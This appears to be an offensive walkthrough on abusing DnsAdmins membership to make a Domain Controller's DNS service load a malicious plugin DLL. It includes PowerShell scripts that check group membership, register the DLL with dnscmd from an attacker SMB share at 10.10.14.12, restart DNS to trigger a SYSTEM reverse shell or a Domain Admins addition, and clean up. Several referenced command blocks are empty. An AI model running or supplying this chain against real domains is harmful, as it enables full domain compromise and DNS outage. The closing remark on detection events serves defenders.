Members of the DnsAdmins group can abuse a legitimate feature of the Microsoft DNS server management protocol (MS-DNSP, driven by the dnscmd tool) to make the DNS server load an arbitrary DLL as a server-level plugin. The DNS service (dns.exe) runs as NT AUTHORITY\SYSTEM, and because DNS is usually hosted on a Domain Controller, code execution in that context is equivalent to Domain Administrator privileges.
Once in an AD environment, check whether your user is a member of DnsAdmins, either directly or through a nested group. DnsAdmins is a domain local group, so whoami /groups lists it with the type "Alias". The commands:
If the output is as follows:
or
Then you can abuse this privilege!
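The membership check described above, as an added example that is not part of the original post. It combines the token view (whoami) with a recursive expansion of the group in the directory via ADSI, so it works from an evil-winrm shell without the ActiveDirectory module; the only assumption is that the shell runs in the target domain.

```powershell
# Added example (not from the original post): confirm DnsAdmins membership
# for the current user, from the logon token and from the directory,
# including nested groups. Built-in tooling only (whoami + ADSI).

# 1. Token view. DnsAdmins is a domain local group, so whoami reports it
#    with Type "Alias". This catches direct and nested membership that was
#    already resolved when the session's token was built.
$tokenHit = whoami /groups /fo csv |
    ConvertFrom-Csv |
    Where-Object { $_.'Group Name' -like '*\DnsAdmins' }

# 2. Directory view. Expand the group's members recursively; this also
#    shows memberships granted after logon that are not in the token yet.
function Get-GroupMembersRecursive {
    param([string]$GroupDn, [hashtable]$Seen = @{})
    $group = [ADSI]"LDAP://$GroupDn"
    foreach ($memberDn in @($group.Properties['member'])) {
        if ($Seen.ContainsKey($memberDn)) { continue }   # guard against group cycles
        $Seen[$memberDn] = $true
        $member = [ADSI]"LDAP://$memberDn"
        if ($member.Properties['objectClass'] -contains 'group') {
            Get-GroupMembersRecursive -GroupDn $memberDn -Seen $Seen
        } else {
            $sam = $member.Properties['sAMAccountName']
            if ($sam.Count) { [string]$sam[0] } else { $memberDn }   # e.g. foreign security principals
        }
    }
}

$rootDse  = [ADSI]'LDAP://RootDSE'
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.SearchRoot = [ADSI]"LDAP://$($rootDse.Properties['defaultNamingContext'][0])"
$searcher.Filter     = '(&(objectClass=group)(sAMAccountName=DnsAdmins))'
$result = $searcher.FindOne()
if (-not $result) { throw 'DnsAdmins group not found in this domain' }

$members = @(Get-GroupMembersRecursive -GroupDn $result.Properties['distinguishedname'][0])
"DnsAdmins members (expanded): $($members -join ', ')"

if ($tokenHit -or ($members -contains $env:USERNAME)) {
    "$env:USERNAME is in DnsAdmins: server-level plugin DLL abuse is possible"
} else {
    "$env:USERNAME is not in DnsAdmins"
}
```

If the directory view says you are a member but the token view does not, the membership was added after you logged on; a fresh logon (new evil-winrm session) is needed before dnscmd will accept your calls.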
Use msfvenom (from Metasploit) to build a malicious DLL that returns a reverse shell:
There are several ways to get the DLL onto the target: host it on an SMB share (the DNS service can load it straight from a UNC path), serve it from a Python HTTP server and download it, or, if you already have a shell through evil-winrm, simply upload the file. Whichever you pick, the path must be readable by the DNS service, which runs as SYSTEM and, for a UNC path, authenticates as the DC's machine account.
With impacket-smbserver you can start a share with a name of your choosing and check that it is reachable. Then, from the target host, use net view to confirm the share is visible; the DNS service will fetch the DLL from the UNC path itself, so there is no need to copy it locally.
From your own machine, check that the share is up with:
Replace 10.10.14.12 with your SMB server's IP. To confirm that the target can reach your share, run on the target:
With Python's http.server module you can host the DLL and download it on the target with common utilities (certutil, PowerShell's Invoke-WebRequest, and similar). Save it to a directory that SYSTEM can read, such as the user's own profile folder.
HOSTING
DOWNLOADING
From an evil-winrm session, just run: upload /path/to/pew.dll
We now register the DLL as the DNS server's server-level plugin with dnscmd. Nothing is injected into dnscmd itself: the tool calls the DNS RPC management interface, which DnsAdmins are allowed to use, and the server writes the ServerLevelPluginDll value under its Parameters registry key on our behalf (a key DnsAdmins cannot write directly):
Now that the DLL is registered, restart the DNS service so dns.exe loads it and triggers the reverse shell. Stopping and starting the service is a separate right that DnsAdmins membership does not grant by default; if sc stop dns is denied, inspect the service ACL with sc sdshow dns. Also expect DNS on the DC to stay down afterwards: the msfvenom DLL does not export the plugin functions the server looks for, so after DllMain has run the service fails to initialise until the registry value is removed.
This should give you a reverse shell as NT AUTHORITY\SYSTEM on the Domain Controller.
Alternatively, if a reverse shell is more than you need, build a DLL that simply adds your user to the Domain Admins group. Below is the command to create the DLL:
Upload it to the target host and trigger it the same way: register it with dnscmd and restart the DNS service. Once the service has loaded it, confirm the result with net group "Domain Admins" /domain. Note that an existing session's token does not pick up the new group; log on again (a new evil-winrm session) to use the Domain Admin rights.
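The register, restart and clean-up sequence from the steps above, as an added example that is not part of the original post. It assumes you run it on the DC as the DnsAdmins member (for instance inside evil-winrm) and that the DLL is served from the hypothetical share \\10.10.14.12\share\pew.dll exactly as hosted with impacket-smbserver earlier; the same function works for either payload DLL.

```powershell
# Added example (not from the original post): register the plugin DLL,
# restart the DNS service, verify what happened, and clean up afterwards.
# Hypothetical values: DNS runs on the local DC, DLL on \\10.10.14.12\share.
$DnsServer = $env:COMPUTERNAME
$DllUnc    = '\\10.10.14.12\share\pew.dll'
$RegPath   = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Invoke-DnsPluginDll {
    param([string]$Server, [string]$DllPath)

    # dns.exe reads the DLL as SYSTEM (the DC machine account for a UNC
    # path), so host it on a share that allows anonymous reads (the
    # impacket-smbserver default) or in a local directory SYSTEM can read.
    if (-not (Test-Path -LiteralPath $DllPath)) {
        throw "DLL not reachable at $DllPath from this account"
    }

    # Start/stop on the service is NOT part of DnsAdmins membership. In the
    # SDDL below, RP = SERVICE_START and WP = SERVICE_STOP; one of your
    # SIDs must be granted both, or the restart step will fail.
    sc.exe sdshow dns

    # Register via the DNS RPC interface; the server writes the
    # ServerLevelPluginDll registry value for us.
    dnscmd $Server /config /serverlevelplugindll $DllPath
    if ($LASTEXITCODE -ne 0) { throw "dnscmd failed with exit code $LASTEXITCODE" }

    # Restart so dns.exe loads the DLL. A DLL without the plugin exports
    # (msfvenom output) still has its DllMain executed, but the service
    # will then fail to initialise and stay down until the value is removed.
    sc.exe stop dns | Out-Null
    Start-Sleep -Seconds 3
    sc.exe start dns | Out-Null

    # Confirm the outcome from the DNS Server log: 770 = plugin DLL loaded,
    # 150 = plugin DLL failed to load or initialise.
    Get-WinEvent -FilterHashtable @{ LogName = 'DNS Server'; Id = 150, 770 } `
        -MaxEvents 5 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

function Remove-DnsPluginDll {
    # Run this from the elevated shell the payload gives you (SYSTEM or
    # Domain Admin); a plain DnsAdmins member cannot write the key directly.
    param([string]$Path = $RegPath)
    Remove-ItemProperty -Path $Path -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    sc.exe stop dns | Out-Null
    Start-Sleep -Seconds 3
    sc.exe start dns | Out-Null
    (Get-Service dns).Status      # should read Running again
}

Invoke-DnsPluginDll -Server $DnsServer -DllPath $DllUnc
```

Call Remove-DnsPluginDll once you have the SYSTEM shell or the Domain Admin logon: it restores name resolution on the DC and removes the persistent registry value that would otherwise re-run the DLL on every DNS restart. The 770/150 events it queries are also the signal a defender should alert on.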